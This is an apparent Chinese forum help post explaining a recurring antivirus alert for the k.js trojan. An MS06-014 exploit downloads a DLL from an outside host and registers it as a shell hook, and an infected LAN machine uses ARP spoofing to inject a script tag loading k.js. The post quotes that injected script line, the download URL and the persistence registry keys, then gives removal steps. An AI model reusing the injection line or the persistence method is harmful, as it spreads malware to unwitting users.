腳本病毒：Trojan.DL.VBS.Agent.cpb （文件名為k[1].js)老是在internet臨時(shí)文件里出現(xiàn)，瑞星監(jiān)控殺了又來(lái)，如此反復(fù)著！我試圖清空臨時(shí)文件，但一上網(wǎng)打開(kāi)網(wǎng)頁(yè)（不管是哪些網(wǎng)頁(yè)），那個(gè)k[1].js又會(huì)被瑞星監(jiān)控到。這是怎么回事呀？是誤報(bào)嗎？

　　該網(wǎng)頁(yè)利用MS06-014漏洞，下載http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll，并直接寫入注冊(cè)表


Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}指向C:\WINDOWS\winhelp.dll


　　由于瑞星查殺了k.js，一般情況下大家是不會(huì)中毒的。但是之所以重復(fù)出現(xiàn)k.js的報(bào)毒，原因是：

　　局域網(wǎng)中有電腦中了此毒，然后向局域網(wǎng)中其他電腦發(fā)動(dòng)ARP攻擊，將其他用戶接收到的網(wǎng)絡(luò)數(shù)據(jù)包中加入


Code:
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>


的代碼，導(dǎo)致其他用戶訪問(wèn)任何網(wǎng)站時(shí)都會(huì)報(bào)毒。

　　所以，首先，確認(rèn)你的電腦是否中毒：

　　確認(rèn)以下注冊(cè)表路徑是否存在：


Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]


　　如果存在，嘗試在安全模式下刪除這兩個(gè)注冊(cè)表路徑。

　　如果不存在，說(shuō)明不是你本機(jī)的中毒問(wèn)題，而是你受到ARP攻擊的緣故。

　　這種情況下，請(qǐng)聯(lián)系局域網(wǎng)網(wǎng)管進(jìn)行協(xié)調(diào)處理。必須找到中毒并進(jìn)行ARP欺騙的電腦，然后將其斷網(wǎng)查毒。

最新評(píng)論